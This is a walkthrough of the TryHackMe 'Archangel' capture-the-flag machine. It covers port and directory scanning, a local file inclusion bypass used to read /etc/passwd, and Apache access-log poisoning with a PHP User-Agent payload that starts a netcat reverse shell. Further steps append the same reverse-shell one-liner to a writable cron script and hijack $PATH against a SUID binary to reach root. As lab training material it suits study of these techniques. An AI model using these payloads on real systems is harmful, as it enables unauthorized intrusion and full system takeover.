[Tryhackme]+Archangel (LFI+ file parsing vulnerability getshell, modify $PATH path + SUID privilege escalation)


The hosts infiltrated in this article are legally authorized. The tools and methods used in this article are only for learning and communication. Please do not use the tools and penetration ideas used in this article for any illegal purposes. I will not be responsible for any consequences arising from this, nor will I be responsible for any misuse or damage caused Responsible.

discovery service

└─# nmap -sV -Pn 
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-29 05:43 EDT
Nmap scan report for
Host is up (0.32s latency).
Not shown: 998 closed ports
22/tcp openssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp openhttpApache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.39 seconds 

Infiltrate port 80

Blasting catalog

└─# python3 dirsearch.py -e* -t 100 -u _|. _ ____ _|_v0.4.2 (_||| _) (/_(_|| (_| ) Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492

Output File: /root/dirsearch/reports/

Error Log: /root/dirsearch/logs/errors-21-10-29_06-02-36.log


[06:02:37] Starting: 
[06:03:59] 301 -312B- /flags->[06:04:06] 301 -313B- /images->[06:04:06] 200 -0B- /images/[06:04:08] 200 - 19KB - /index.html 
[06:04:29] 301 -312B- /pages->[06:04:30] 200 -0B- /pages/ 
[06:04:44] 403 -277B- /server-status 

/flags redirects to a youtube video, no other information, should be a rabbit hole other folders have no other information

Check the source code of the webpage, find a domain name in Send us a mail, write mafialive.thm into the host file

echo " mafialive.thm" >> /etc/hosts

Open mafialive.thm and find flag1

Blow up the directory again

└─# python3 dirsearch.py -e* -t 100 -u http://mafialive.thm _|. _ ____ _|_v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492

Output File: /root/dirsearch/reports/mafialive.thm/_21-11-01_06-52-00.txt

Error Log: /root/dirsearch/logs/errors-21-11-01_06-52-00.log

Target: http://mafialive.thm/

[06:52:01] Starting: 
[06:53:22] 200 - 59B- /index.html 
[06:53:50] 200 - 34B- /robots.txt[06:54:02] 200 -286B- /test.php 

Open test.php, click the webpage buttom, the url displays a string of paths, modifying the path file name can access the content of some files on the server, indicating that there is an LFI vulnerability

We use the php pseudo-protocol to output the source code of the entire webpage, and the payloadr is as follows


Print out the source code of test.php and get flag2

Review upload code

 function containsStr($str, $substr) {return strpos($str, $substr) !== false;}if(isset($_GET["view"])){if(!containsStr($_GET['view'], '../..') && containsStr($_GET['view'], '/var/www/html/development_testing')) {include $_GET['view'];}else{echo 'Sorry, Thats not allowed';}

Only when the two strings of ../.. and /var/www/html/development_testing must be present, the inclusion logic will take effect

We can use // instead of / to bypass the restriction that ../.. cannot appear, and read /etc/passwdpayload as follows


Get the username after decryption

list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin

It can be seen from the above that there is a user archangel. There is no result after blasting this user's ssh, so I can only think of other methods

After testing here, I got the path of apache's access.log



There is a file parsing vulnerability in the apache2.4-2.9 version. Combined with LFI, we can write the payload into the log, and then access the log file on the web page, then the rebound shell can be triggered

First, let's look at normal log records like this: - - [02/Nov/2021:14:14:38 +0530] "GET /test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/..//..//..//..//etc/passwd HTTP/1.1" 200 1277 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0" 

As can be seen from the above log, apache records the url access path and User-Agent information

Then we can write the php code to User-Agent, taking the above as an example, the effect we expect is this: - - [02/Nov/2021:14:14:38 +0530] "GET /test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/..//..//..//..//etc/passwd HTTP/1.1" 200 1277 "-" "<php phpinfo(); ?>" 

Then access this log in the browser

If the php version information can be displayed on the web page at this time, it means that our php code can be executed normally


Open burpsuite, we write the payload to User-Agent:

GET /test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/..//..//..//..//var/log/apache2/access.log HTTP/1.1
Host: mafialive.thm
User-Agent: "<?php exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4444 >/tmp/f') ?>"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1 

open monitor

nc -lnvp 4444



Reverse shell received

└─# nc -lnvp 4444
listening on [any] 4444 ...
connect to [] from (UNKNOWN) [] 54296
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
$ ls
$ cd /home
$ ls
$ cd archangel
$ ls

Get user.txt in the same folder, the secret file has no read permission, there is a password file in the myfiles folder, and the content of the file is the video of Don’t Give Up (AKA: Tease You) in youtube

Elevate rights to archangel

It is passed that linpeas found that there is a scheduled task of archangel, and this file is still writable

www-data@ubuntu:/var/www/html/development_testing$ cat /opt/helloworld.sh
cat /opt/helloworld.sh
echo "hello world" >> /opt/backupfiles/helloworld.txt
www-data@ubuntu:/var/www/html/development_testing$ ls -alh /opt/helloworld.sh
ls -alh /opt/helloworld.sh
-rwxrwxrwx 1 archangel archangel 66 Nov 202020 /opt/helloworld.sh 

Write shell to timed task

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4242 >/tmp/f" >> /opt/helloworld.sh 

Reverse shell received

└─# nc -lnvp 4242 
listening on [any] 4242 ...
connect to [] from (UNKNOWN) [] 37592
/bin/sh: 0: can't access tty; job control turned off
$ whoami
$ id
uid=1001(archangel) gid=1001(archangel) groups=1001(archangel)

Get the second user.txt in /home/archangel/secret

Escalation of rights

There is a backup file in the same folder with SUID permission. After downloading it to the target machine, use the strings command to analyze it. It is found that there is a shell fragment:

└─# strings backup
cp /home/user/archangel/myfiles/* /opt/backupfiles 


We observe the above line of shell code

cp /home/user/archangel/myfiles/* /opt/backupfiles 

The code itself is to copy the content on /home/user/archangel/myfiles/* to /opt/backupfiles through the cp command

We know that the SUID file is a file that ordinary users can run as root. Although the cp in this file is a command issued by the ordinary user group, it is run as root. That is to say, if we can hijack this command and rewrite it content, we can use it to elevate rights.

In linux, all user commands are stored in his $PATH environment variable. When we type commands one by one in the terminal, the linux server will search for the command one by one from the current user's environment variable path. If the binary file of the command exists, execute it; if it does not exist, report command not found.

start escalation

View the current user's environment variable $PATH

echo $PATH

Add the home directory /home/archangel to the environment variable $PATH

archangel@ubuntu:~$ export PATH=/home/archangel:$PATH
export PATH=/home/archangel:$PATH
archangel@ubuntu:~$ echo $PATH
echo $PATH

Create a cp file under the newly added $PATH path and give it execution permission

archangel@ubuntu:~$ touch cp
touch cp
archangel@ubuntu:~$ chmod +x cp
chmod +x cp 

Add the following code to the newly created cp file

bash -p 

view cp file

archangel@ubuntu:~$ cat cp
cat cp
bash -p 

Everything is ready, execute SUID file backup, and escalate to root

archangel@ubuntu:~/secret$ ./backup
root@ubuntu:~/secret# id
uid=0(root) gid=0(root) groups=0(root),1001(archangel)
root@ubuntu:~/secret# whoami
root@ubuntu:~/secret# cat /root/root.txt
cat /root/root.txt 


Wonderful target machine, learned a lot of new knowledge. There are generally two postures for LFI to hold the shell:

1.LFI+ upload file getshell 2. LFI+ file parsing vulnerability getshell This article uses the second method. Regarding the first method, I am in this drone there is a record

In terms of privilege escalation, the method of modifying the environment variable $PATH is used. This method of privilege escalation needs to be combined with SUID. This article modifies the cp command, but other commands may also be modified. Such as mv,tar, etc., this depends on the specific situation of the target machine.

Tags: Cyber Security

Posted by kaedus on Fri, 06 Jan 2023 02:58:45 +0530